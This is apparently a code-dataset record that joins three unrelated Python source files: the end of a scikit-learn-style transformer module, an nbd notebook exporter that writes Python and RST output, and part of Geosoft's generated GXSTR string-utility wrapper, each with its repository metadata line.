steps[-1][1].set_params(**self.best_params[param_key])
if not collect_n:
scores = cross_val_score(Pipeline(steps), X, y,
scoring=scoring,
cv=self.eval_cv,
n_jobs=-1)
else:
init_random_state = self.eval_cv.random_state
scores = list()
for i in range(collect_n):
fold_prediction = cross_val_predict(Pipeline(steps), X, y,
cv=self.eval_cv,
n_jobs=-1)
metric = check_scoring(steps[-1][1],
scoring=scoring).__dict__['_score_func']
scores.append(metric(y, fold_prediction))
self.eval_cv.random_state += 1
self.eval_cv.random_state = init_random_state
return scores
class MatrixTransformer(TransformerMixin, BaseEstimator):
"""
    Helps to add your own transformation through ordinary functions.
Parameters
----------
func : function
A function that transforms input data.
params : dict
Parameters for the function.
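
    Examples
    --------
    A hedged sketch (assumes a 3D array of matrices and a function of a
    single matrix):

    >>> import numpy as np
    >>> X = np.random.rand(10, 5, 5)
    >>> row_sums = MatrixTransformer(func=lambda m: m.sum(axis=1))
    >>> X_new = row_sums.fit_transform(X)  # applies func to each X[i]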
"""
def __init__(
self,
func,
**params):
self.func = func
self.params = params
def fit(self, X, y=None, **fit_params):
"""
Fits the data.
Parameters
----------
X : array-like
The data to fit. Should be a 3D array.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
"""
return self
def transform(self, X, y=None):
"""
Transforms the data according to function you set.
Parameters
----------
X : array-like
            The data to transform. Should be a 3D array (one matrix per
            sample).
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
"""
X = X.copy()
new_X = []
for i in range(len(X)):
new_X.append(self.func(X[i], **self.params))
return array(new_X)
class DataTransformer(TransformerMixin, BaseEstimator):
"""
    Helps to add your own transformation through ordinary functions.
Parameters
----------
func : function
A function that transforms input data.
params : dict
Parameters for the function.
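
    Examples
    --------
    A hedged sketch (the function receives the whole dataset at once):

    >>> import numpy as np
    >>> X = np.random.rand(10, 5)
    >>> center = DataTransformer(func=lambda data: data - data.mean(axis=0))
    >>> X_new = center.fit_transform(X)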
"""
def __init__(
self,
func,
**params):
self.func = func
self.params = params
def fit(self, X, y=None, **fit_params):
"""
Fits the data.
Parameters
----------
X : array-like
            The data to fit. Can be, for example, a list, an array of at
            least two dimensions, or a dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
"""
return self
def transform(self, X, y=None):
"""
Transforms the data according to function you set.
Parameters
----------
X : array-like
            The data to transform. Can be, for example, a list, an array
            of at least two dimensions, or a dictionary.
y : array-like, optional, default: None
The target variable to try to predict in the case of supervised learning.
"""
X = X.copy()
return self.func(X, **self.params)
__all__ = ['MatrixTransformer',
'DataTransformer',
'Pipeliner']
| bsd-3-clause | 620,806,418,496,660,200 | 36.42931 | 90 | 0.554655 | false |
lcary/nbd | nbd/export.py | 1 | 3791 | from abc import (ABCMeta, abstractmethod, abstractproperty)
from os import path as ospath
import logging
import nbformat
from nbconvert import (PythonExporter, RSTExporter)
from nbd.fileops import (get_file_id, write_file)
EXPORT_FORMAT_PYTHON = 'python'
EXPORT_FORMAT_RST = 'rst'
logger = logging.getLogger()
class ExporterWrapper(object):
NOT_IMPL_MSG = 'Exporter wrapper not implemented.'
__metaclass__ = ABCMeta
@abstractproperty
def file_extension(self):
raise NotImplementedError(self.NOT_IMPL_MSG)
@abstractmethod
def export(self, basename, notebook_node, filepath):
raise NotImplementedError(self.NOT_IMPL_MSG)
def _export_content(self, notebook_node, filepath):
"""
Exports notebook data in a given format to a file in the output dir.
Returns notebook content and resources.
"""
(content, resources) = self.exporter.from_notebook_node(notebook_node)
write_file(filepath, content, write_mode='w')
return (content, resources)
def _get_filepath(self, output_dir, basename):
filename = "{}.{}".format(basename, self.file_extension)
return ospath.join(output_dir, filename)
class PythonExporterWrapper(ExporterWrapper):
def __init__(self):
self.exporter = PythonExporter()
@property
def file_extension(self):
return 'py'
def export(self, basename, notebook_node, output_dir):
"""
Exports notebook data in python format.
"""
filepath = self._get_filepath(output_dir, basename)
self._export_content(notebook_node, filepath)
class RSTExporterWrapper(ExporterWrapper):
def __init__(self):
self.exporter = RSTExporter()
@property
def file_extension(self):
return 'rst'
def export(self, basename, notebook_node, output_dir):
"""
Exports notebook data in rst format.
"""
filepath = self._get_filepath(output_dir, basename)
(content, resources) = self._export_content(notebook_node, filepath)
self._export_resources(basename, output_dir, resources)
def _export_resources(self, basename, output_dir, resources):
"""
Exports any additional resources (e.g. PNG files in notebook)
"""
try:
for (filename, b64data) in resources['outputs'].items():
filepath = self._get_resource_filepath(output_dir, basename, filename)
write_file(filepath, b64data, write_mode='wb')
    except (AttributeError, KeyError):
logger.debug('Unable to find resources in notebook when exporting RST.')
@classmethod
def _get_resource_filepath(cls, output_dir, basename, filename):
filename = get_file_id(basename + "__" + filename)
return ospath.join(output_dir, filename)
class NotebookExporter(object):
"""
Process a list of notebooks by creating a directory and exporting
  notebooks to the specified formats (python, rst, and binary files).
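
  A hedged usage sketch (assumes a notebook file ``demo.ipynb`` and an
  existing output directory ``out``; the names are illustrative):

  >>> exporter = NotebookExporter(nbformat_version=4,
  ...                             export_formats=['python', 'rst'])
  >>> exporter.process_notebook('demo', 'demo.ipynb', 'out')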
"""
DEFAULT_EXPORT_FORMATS = (EXPORT_FORMAT_PYTHON, EXPORT_FORMAT_RST)
def __init__(self, nbformat_version, export_formats=None):
self.nbformat_version = nbformat_version
self._export_formats = self._get_export_formats(export_formats)
self.python_exporter = PythonExporterWrapper()
self.rst_exporter = RSTExporterWrapper()
def _get_export_formats(self, export_formats):
if export_formats is None:
return list(self.DEFAULT_EXPORT_FORMATS)
else:
return export_formats
def process_notebook(self, basename, filepath, output_dir):
"""
Reads a notebook of a given format, then exports data.
"""
notebook_node = nbformat.read(filepath, as_version=self.nbformat_version)
if EXPORT_FORMAT_PYTHON in self._export_formats:
self.python_exporter.export(basename, notebook_node, output_dir)
if EXPORT_FORMAT_RST in self._export_formats:
self.rst_exporter.export(basename, notebook_node, output_dir)
| mit | 7,295,198,112,324,375,000 | 30.330579 | 78 | 0.710367 | false |
GeosoftInc/gxpy | geosoft/gxapi/GXSTR.py | 1 | 48660 | ### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXSTR(gxapi_cy.WrapSTR):
"""
GXSTR class.
This library is not a class. Use the `GXSTR <geosoft.gxapi.GXSTR>` library functions
to work with and manipulate string variables. Since the
GX Programming Language does not provide string literal
tokens, you must use these functions for any string operations
you want to perform.
"""
def __init__(self, handle=0):
super(GXSTR, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXSTR <geosoft.gxapi.GXSTR>`
:returns: A null `GXSTR <geosoft.gxapi.GXSTR>`
:rtype: GXSTR
"""
return GXSTR()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Data Input
@classmethod
def scan_i(cls, str_val):
"""
Convert a string to a GX int.
:param str_val: String to convert to an integer
:type str_val: str
:returns: Resulting Integer, `iDUMMY <geosoft.gxapi.iDUMMY>` is bad integer
:rtype: int
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._scan_i(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def scan_date(cls, str_val, type):
"""
Convert a date string to a GX real.
:param str_val: Date string
:param type: :ref:`DATE_FORMAT`
:type str_val: str
:type type: int
:returns: Resulting Real, `rDUMMY <geosoft.gxapi.rDUMMY>` if conversion fails.
:rtype: float
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** OLD usage, use ScanForm_STR instead.
"""
ret_val = gxapi_cy.WrapSTR._scan_date(GXContext._get_tls_geo(), str_val.encode(), type)
return ret_val
@classmethod
def scan_form(cls, str_val, type):
"""
Convert a formated string to a real.
:param str_val: Date string
:param type: :ref:`GS_FORMATS`
:type str_val: str
:type type: int
:returns: Resulting Real, `rDUMMY <geosoft.gxapi.rDUMMY>` if conversion fails.
:rtype: float
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._scan_form(GXContext._get_tls_geo(), str_val.encode(), type)
return ret_val
@classmethod
def scan_r(cls, str_val):
"""
Convert a string to a GX real.
:param str_val: String to convert to a real
:type str_val: str
:returns: Resulting Real, `rDUMMY <geosoft.gxapi.rDUMMY>` if bad string.
:rtype: float
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._scan_r(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def scan_time(cls, str_val, type):
"""
Convert a time string to a GX real.
:param str_val: Date string
:param type: :ref:`TIME_FORMAT`
:type str_val: str
:type type: int
:returns: Resulting Real, `rDUMMY <geosoft.gxapi.rDUMMY>` if conversion fails.
:rtype: float
.. versionadded:: 6.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** OLD usage, use ScanForm_STR instead.
"""
ret_val = gxapi_cy.WrapSTR._scan_time(GXContext._get_tls_geo(), str_val.encode(), type)
return ret_val
# File Name
@classmethod
def file_combine_parts(cls, drive, dir, file, ext, qual, file_name):
"""
Combine file parts to build a file name.
:param drive: Drive
:param dir: Directory
:param file: Name
:param ext: Extension
:param qual: Qualifiers
:param file_name: Destination string, can be same as input
:type drive: str
:type dir: str
:type file: str
:type ext: str
:type qual: str
:type file_name: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
file_name.value = gxapi_cy.WrapSTR._file_combine_parts(GXContext._get_tls_geo(), drive.encode(), dir.encode(), file.encode(), ext.encode(), qual.encode(), file_name.value.encode())
@classmethod
def file_ext(cls, ifile, ext, ofile, opt):
"""
Add a file extension onto a file name string.
:param ifile: File name to extend
:param ext: Extension if "", extenstion and '.' are stripped.
:param ofile: Extended file name (can be same as input)
:param opt: :ref:`FILE_EXT`
:type ifile: str
:type ext: str
:type ofile: str_ref
:type opt: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ofile.value = gxapi_cy.WrapSTR._file_ext(GXContext._get_tls_geo(), ifile.encode(), ext.encode(), ofile.value.encode(), opt)
@classmethod
def file_name_part(cls, file, file_part, part):
"""
Get part of a file name.
:param file: File name
:param file_part: Destination string, can be same as input
:param part: :ref:`STR_FILE_PART`
:type file: str
:type file_part: str_ref
:type part: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
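
        Examples
        --------
        A hedged sketch using the Python wrapper; ``STR_FILE_PART_NAME``
        is assumed to be the :ref:`STR_FILE_PART` constant for the name
        part:

        >>> from geosoft.gxapi import str_ref, STR_FILE_PART_NAME
        >>> part = str_ref()
        >>> GXSTR.file_name_part("grid.grd", part, STR_FILE_PART_NAME)
        >>> part.value  # expected: 'grid'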
"""
file_part.value = gxapi_cy.WrapSTR._file_name_part(GXContext._get_tls_geo(), file.encode(), file_part.value.encode(), part)
@classmethod
def get_m_file(cls, in_str, out_str, index):
"""
Get the indexed filepath from a multiple filepath string
:param in_str: Input multifile string
:param out_str: Output filepath string
:param index: Index of file
:type in_str: str
:type out_str: str_ref
:type index: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The multifile string must use '|' as a delimiter.
Do not pass a string after calling `tokenize <geosoft.gxapi.GXSTR.tokenize>`.
"""
out_str.value = gxapi_cy.WrapSTR._get_m_file(GXContext._get_tls_geo(), in_str.encode(), out_str.value.encode(), index)
@classmethod
def remove_qualifiers(cls, ifile, ofile):
"""
Remove file qualifiers from a file name
:param ifile: Input file name
:param ofile: Output file name (can be same as input)
:type ifile: str
:type ofile: str_ref
.. versionadded:: 7.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ofile.value = gxapi_cy.WrapSTR._remove_qualifiers(GXContext._get_tls_geo(), ifile.encode(), ofile.value.encode())
# Formating
@classmethod
def format_crc(cls, pul_crc, buff, width):
"""
Convert a GX CRC value to a string.
:param pul_crc: CRC value to format
:param buff: Resulting string
:param width: Width of the field
:type pul_crc: int
:type buff: str_ref
:type width: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_crc(GXContext._get_tls_geo(), pul_crc, buff.value.encode(), width)
@classmethod
def format_date(cls, real, buff, width, type):
"""
Convert a GX real to a date string.
:param real: Date value in decimal years to format
:param buff: Resulting string
:param width: Width of the field
:param type: :ref:`DATE_FORMAT`
:type real: float
:type buff: str_ref
:type width: int
:type type: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_date(GXContext._get_tls_geo(), real, buff.value.encode(), width, type)
@classmethod
def format_i(cls, value, buff, width):
"""
Convert a GX int to a string.
:param value: Value to format
:param buff: Resulting string
:param width: Width of the field
:type value: int
:type buff: str_ref
:type width: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_i(GXContext._get_tls_geo(), value, buff.value.encode(), width)
@classmethod
def format_r(cls, real, buff, width, sig):
"""
Convert a GX real to a string with significant digits.
:param real: Value to format
:param buff: Resulting string
:param width: Width of the field
:param sig: Significant digits
:type real: float
:type buff: str_ref
:type width: int
:type sig: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_r(GXContext._get_tls_geo(), real, buff.value.encode(), width, sig)
@classmethod
def format_r2(cls, real, buff, width, sig):
"""
Convert a GX real to a string with given decimals.
:param real: Value to format
:param buff: Resulting string
:param width: Width of the field
:param sig: Decimals
:type real: float
:type buff: str_ref
:type width: int
:type sig: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_r2(GXContext._get_tls_geo(), real, buff.value.encode(), width, sig)
@classmethod
def format_double(cls, real, buff, type, width, dec):
"""
Convert a GX real to a string.
:param real: Value to format
:param buff: Resulting string
:param type: :ref:`GS_FORMATS`
:param width: Width of the field
:param dec: Significant digits/decimals
:type real: float
:type buff: str_ref
:type type: int
:type width: int
:type dec: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_double(GXContext._get_tls_geo(), real, buff.value.encode(), type, width, dec)
@classmethod
def format_time(cls, real, buff, width, deci, type):
"""
Convert a GX real to a time string.
:param real: Time value in decimal hours to format
:param buff: Resulting string
:param width: Width of the field
:param deci: Decimals to format with
:param type: :ref:`TIME_FORMAT`
:type real: float
:type buff: str_ref
:type width: int
:type deci: int
:type type: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
buff.value = gxapi_cy.WrapSTR._format_time(GXContext._get_tls_geo(), real, buff.value.encode(), width, deci, type)
# General
@classmethod
def escape(cls, str_val, opt):
"""
Convert/replace escape sequences in strings.
:param str_val: String to modify
:param opt: :ref:`STR_ESCAPE`
:type str_val: str_ref
:type opt: int
.. versionadded:: 5.0.6
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Escape characters:
\\a bell
\\b backspace
\\f formfeed
\\n new line
\\r carriage return
\\t tab
\\v vertical tab
\\" quote character
\\x take 'x' literally
\\ backslash
\\ooo octal up to 3 characters
\\xhh hex up to 2 characters
A common use of this function is to convert double-quote characters in
        a user input string to \\" so the string can be placed in a tokenized
string.
"""
str_val.value = gxapi_cy.WrapSTR._escape(GXContext._get_tls_geo(), str_val.value.encode(), opt)
@classmethod
def char_(cls, str_val):
"""
Returns the ASCII value of a character.
:param str_val: String to return ascii value of first character
:type str_val: str
:returns: ASCII value of first character in string.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._char_(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def char_n(cls, str_val, c, max):
"""
Returns the ASCII value of the n'th character.
:param str_val: String
:param c: Character to get
:param max: Maximum string length (unused)
:type str_val: str
:type c: int
:type max: int
:returns: ASCII value of n'th character in string.
The first character is 0.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._char_n(GXContext._get_tls_geo(), str_val.encode(), c, max)
return ret_val
@classmethod
def justify(cls, in_str, out_str, width, just):
"""
Justify a string
:param in_str: String to justify
:param out_str: Result string, can be same as input
:param width: Justification width
:param just: :ref:`STR_JUSTIFY`
:type in_str: str
:type out_str: str_ref
:type width: int
:type just: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the string is too big to fit in the number of display characters,
the output string will be "**" justified as specified.
"""
out_str.value = gxapi_cy.WrapSTR._justify(GXContext._get_tls_geo(), in_str.encode(), out_str.value.encode(), width, just)
@classmethod
def replacei_match_string(cls, istr, old, new_str):
"""
        Replaces all occurrences of the match string with the replacement string (case insensitive).
:param istr: Destination String
:param old: Match string to replace
:param new_str: Replacement string
:type istr: str_ref
:type old: str
:type new_str: str
.. versionadded:: 7.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the replacement string is "" (NULL character)
then the string to replace is removed from the
input string, and the string is shortened.
"""
istr.value = gxapi_cy.WrapSTR._replacei_match_string(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_str.encode())
@classmethod
def replace_match_string(cls, istr, old, new_str):
"""
        Replaces all occurrences of the match string with the replacement string (case sensitive).
:param istr: Destination String
:param old: Match string to replace
:param new_str: Replacement string
:type istr: str_ref
:type old: str
:type new_str: str
.. versionadded:: 7.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the replacement string is "" (NULL character)
then the string to replace is removed from the
input string, and the string is shortened.
"""
istr.value = gxapi_cy.WrapSTR._replace_match_string(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_str.encode())
@classmethod
def set_char_n(cls, str_val, c, ascii):
"""
Set the n'th character of a string using an ASCII value
:param str_val: String
:param c: Character to set
:param ascii: ASCII value
:type str_val: str_ref
:type c: int
:type ascii: int
.. versionadded:: 5.1.4
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
str_val.value = gxapi_cy.WrapSTR._set_char_n(GXContext._get_tls_geo(), str_val.value.encode(), c, ascii)
@classmethod
def split_string(cls, origstr, ch, split):
"""
Splits a string in two on a character.
:param origstr: Original string
:param ch: Split character (first character of string)
:param split: Split string past split character.
:type origstr: str_ref
:type ch: str
:type split: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The original string is modified by terminating it
at the character split.
The part of the string past the character split is
copied to the split string.
Split characters in quoted strings are ignored.
This function is mainly intended to separate comments
from control file strings.
"""
origstr.value, split.value = gxapi_cy.WrapSTR._split_string(GXContext._get_tls_geo(), origstr.value.encode(), ch.encode(), split.value.encode())
@classmethod
def strcat(cls, dest, orig):
"""
        This method concatenates a string.
:param dest: Destination String
:param orig: String to add
:type dest: str_ref
:type orig: str
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
dest.value = gxapi_cy.WrapSTR._strcat(GXContext._get_tls_geo(), dest.value.encode(), orig.encode())
@classmethod
def strcmp(cls, first, second, case_sensitive):
"""
This method compares two strings and returns these values
:param first: String A
:param second: String B
:param case_sensitive: :ref:`STR_CASE`
:type first: str
:type second: str
:type case_sensitive: int
:returns: A < B -1
A == B 0
A > B 1
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._strcmp(GXContext._get_tls_geo(), first.encode(), second.encode(), case_sensitive)
return ret_val
@classmethod
def strcpy(cls, dest, orig):
"""
This method copies a string into another string.
:param dest: Destination string
:param orig: Origin string
:type dest: str_ref
:type orig: str
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
dest.value = gxapi_cy.WrapSTR._strcpy(GXContext._get_tls_geo(), dest.value.encode(), orig.encode())
@classmethod
def stri_mask(cls, mask, test):
"""
Case insensitive comparison of two strings.
:param mask: Mask
:param test: String to test
:type mask: str
:type test: str
:returns: 0 if string does not match mask.
1 if string matches mask.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Mask characters '*' - matches any one or more up to
next character
'?' - matches one character
Test is case insensitive
"""
ret_val = gxapi_cy.WrapSTR._stri_mask(GXContext._get_tls_geo(), mask.encode(), test.encode())
return ret_val
@classmethod
def strins(cls, dest, ins, orig):
"""
This method inserts a string at a specified position.
:param dest: Destination String
:param ins: Insert Position
:param orig: String to add
:type dest: str_ref
:type ins: int
:type orig: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the specified position does not fall within the current string
        the source string will simply be concatenated.
"""
dest.value = gxapi_cy.WrapSTR._strins(GXContext._get_tls_geo(), dest.value.encode(), ins, orig.encode())
@classmethod
def strlen(cls, str_val):
"""
Returns the length of a string.
:param str_val: String to find the length of
:type str_val: str
:returns: String length.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._strlen(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def str_mask(cls, mask, test):
"""
Case sensitive comparison of two strings.
:param mask: Mask
:param test: String to test
:type mask: str
:type test: str
:returns: 0 if string does not match mask.
1 if string matches mask.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Mask characters '*' - matches any one or more up to
next character
'?' - matches one character
Test is case sensitive
"""
ret_val = gxapi_cy.WrapSTR._str_mask(GXContext._get_tls_geo(), mask.encode(), test.encode())
return ret_val
@classmethod
def str_min(cls, str_val):
"""
Remove spaces and tabs and return length
:param str_val: String to find the min length of
:type str_val: str_ref
:returns: String length.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** String may be modified. This function should not be
used to determine if a file name string is defined, because
a valid file name can contain spaces, and once "tested" the
name will be altered. Instead, use `str_min2 <geosoft.gxapi.GXSTR.str_min2>`, or use
`GXSYS.file_exist <geosoft.gxapi.GXSYS.file_exist>` to see if the file actually exists.
"""
ret_val, str_val.value = gxapi_cy.WrapSTR._str_min(GXContext._get_tls_geo(), str_val.value.encode())
return ret_val
@classmethod
def str_min2(cls, str_val):
"""
Length less spaces and tabs, string unchanged.
:param str_val: String to find the min length of
:type str_val: str
:returns: String length.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._str_min2(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def strncmp(cls, first, second, n_char, case_sensitive):
"""
Compares two strings to a given number of characters.
:param first: String A
:param second: String B
:param n_char: Number of characters to compare
:param case_sensitive: :ref:`STR_CASE`
:type first: str
:type second: str
:type n_char: int
:type case_sensitive: int
:returns: A < B -1
A == B 0
A > B 1
:rtype: int
.. versionadded:: 5.0.5
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._strncmp(GXContext._get_tls_geo(), first.encode(), second.encode(), n_char, case_sensitive)
return ret_val
@classmethod
def str_str(cls, str_val, sub, case_sensitive):
"""
Scan a string for the occurrence of a given substring.
:param str_val: String to scan
:param sub: String to look for
:param case_sensitive: :ref:`STR_CASE`
:type str_val: str
:type sub: str
:type case_sensitive: int
:returns: -1 if the substring does not occur in the string
Index of first matching location if found
:rtype: int
.. versionadded:: 5.1.6
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._str_str(GXContext._get_tls_geo(), str_val.encode(), sub.encode(), case_sensitive)
return ret_val
@classmethod
def substr(cls, dest, orig, start, length):
"""
Extract part of a string.
:param dest: Destination string
:param orig: Origin string
:param start: Start location
:param length: Number of characters
:type dest: str_ref
:type orig: str
:type start: int
:type length: int
.. versionadded:: 6.2
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The destination string length will be less than the
requested length if the substring is not fully enclosed
in the origin string.
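
        Examples
        --------
        A hedged sketch using the Python wrapper (assuming a 0-based
        start index):

        >>> out = str_ref()
        >>> GXSTR.substr(out, "abcdef", 2, 3)
        >>> out.value  # expected: 'cde'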
"""
dest.value = gxapi_cy.WrapSTR._substr(GXContext._get_tls_geo(), dest.value.encode(), orig.encode(), start, length)
@classmethod
def to_lower(cls, str_val):
"""
Convert a string to lower case.
:param str_val: String
:type str_val: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
str_val.value = gxapi_cy.WrapSTR._to_lower(GXContext._get_tls_geo(), str_val.value.encode())
@classmethod
def to_upper(cls, str_val):
"""
Convert a string to upper case.
:param str_val: String
:type str_val: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
str_val.value = gxapi_cy.WrapSTR._to_upper(GXContext._get_tls_geo(), str_val.value.encode())
@classmethod
def xyz_line(cls, line, xyz):
"""
Make a valid XYZ line name from a valid `GXDB <geosoft.gxapi.GXDB>` line name.
:param line: Line name to convert
:param xyz: Buffer to hold new line name
:type line: str
:type xyz: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
xyz.value = gxapi_cy.WrapSTR._xyz_line(GXContext._get_tls_geo(), line.encode(), xyz.value.encode())
@classmethod
def make_alpha(cls, str_val):
"""
Turns all non alpha-numeric characters into an _.
:param str_val: String to trim
:type str_val: str_ref
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** THE STRING IS MODIFIED.
"""
str_val.value = gxapi_cy.WrapSTR._make_alpha(GXContext._get_tls_geo(), str_val.value.encode())
@classmethod
def printf(cls, dest, mask):
"""
Variable Argument PrintF function
:param dest: Destination string
:param mask: Pattern string
:type dest: str_ref
:type mask: str
.. versionadded:: 7.3
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
dest.value = gxapi_cy.WrapSTR._printf(GXContext._get_tls_geo(), dest.value.encode(), mask.encode())
@classmethod
def replace_char(cls, istr, old, new_char):
"""
Replaces characters in a string.
:param istr: String to modify
:param old: Character to replace (first character only)
:param new_char: Replacement character (first character only)
